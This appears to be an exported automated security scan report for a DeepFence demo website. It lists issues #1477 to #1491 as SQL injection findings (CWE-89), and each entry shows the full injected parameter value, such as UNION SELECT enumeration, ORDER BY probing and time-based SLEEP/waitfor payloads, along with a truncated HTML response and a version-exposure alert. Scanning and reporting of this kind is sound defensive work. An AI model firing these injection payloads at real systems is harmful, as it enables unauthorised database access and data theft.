[(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1477\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \") or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1478\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1479\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# waitfor delay '00:00:05'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1480\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1481\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \\\\\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1482\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1483\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1484\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1485\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1486\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# %' AND 8310=8311 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1487\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 12ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1488\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1489Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1490\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' AND id IS NULL; --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1491\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 